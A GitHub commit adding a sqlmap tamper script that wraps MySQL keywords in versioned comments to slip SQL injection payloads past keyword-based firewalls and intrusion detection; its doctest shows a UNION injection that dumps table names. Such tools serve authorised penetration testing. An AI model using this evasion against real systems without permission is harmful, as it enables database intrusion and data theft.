This commit is contained in:
Pinoy Vendetta 2025-08-06 11:32:55 +08:00 committed by GitHub
commit c540b25cc6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,99 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
"""
This tamper script does not have any dependencies.
"""
pass
def tamper(payload, **kwargs):
"""
Replaces common SQL keywords with MySQL versioned comments (e.g., 'SELECT' becomes '/*!50000SELECT*/').
This technique is useful for bypassing simple keyword-based firewalls and
intrusion detection systems that don't parse MySQL's versioned comment syntax.
The '50000' indicates that the enclosed query should only be executed by MySQL
versions 5.0.0 and above.
Requirement:
* MySQL >= 5.0.0
Notes:
* This tamper script is designed to be quite aggressive and will comment
many different keywords.
>>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
'1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
"""
keywords = {
# DML & DDL
"SELECT": "/*!50000SELECT*/",
"UNION": "/*!50000UNION*/",
"INSERT": "/*!50000INSERT*/",
"UPDATE": "/*!50000UPDATE*/",
"DELETE": "/*!50000DELETE*/",
"FROM": "/*!50000FROM*/",
"WHERE": "/*!50000WHERE*/",
"GROUP BY": "/*!50000GROUP BY*/",
"ORDER BY": "/*!50000ORDER BY*/",
"LIMIT": "/*!50000LIMIT*/",
"ALL": "/*!50000ALL*/",
"DISTINCT": "/*!50000DISTINCT*/",
# Information Schema
"INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
"INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
"TABLE_NAME": "/*!50000TABLE_NAME*/",
"COLUMN_NAME": "/*!50000COLUMN_NAME*/",
"TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",
# Functions
"CONCAT": "/*!50000CONCAT*/",
"CONCAT_WS": "/*!50000CONCAT_WS*/",
"GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
"COUNT": "/*!50000COUNT*/",
"SUBSTRING": "/*!50000SUBSTRING*/",
"CAST": "/*!50000CAST*/",
"CHAR": "/*!50000CHAR*/",
"ASCII": "/*!50000ASCII*/",
"ORD": "/*!50000ORD*/",
"BENCHMARK": "/*!50000BENCHMARK*/",
"SLEEP": "/*!50000SLEEP*/",
# System Information Functions
"DATABASE()": "/*!50000DATABASE()*/",
"USER()": "/*!50000USER()*/",
"SESSION_USER()": "/*!50000SESSION_USER()*/",
"SYSTEM_USER()": "/*!50000SYSTEM_USER()*/",
"VERSION()": "/*!50000VERSION()*/",
"@@VERSION": "/*!50000@@VERSION*/",
"@@HOSTNAME": "/*!50000@@HOSTNAME*/",
# Other keywords
"SEPARATOR": "/*!50000SEPARATOR*/",
"HAVING": "/*!50000HAVING*/",
"INTO": "/*!50000INTO*/",
"OUTFILE": "/*!50000OUTFILE*/",
"DUMPFILE": "/*!50000DUMPFILE*/",
"LOAD_FILE": "/*!50000LOAD_FILE*/",
}
ret_val = payload
if payload:
for keyword in keywords:
ret_val = re.sub(r"(?i)(?<!\w)%s(?!\w)" % re.escape(keyword), keywords[keyword], ret_val)
return ret_val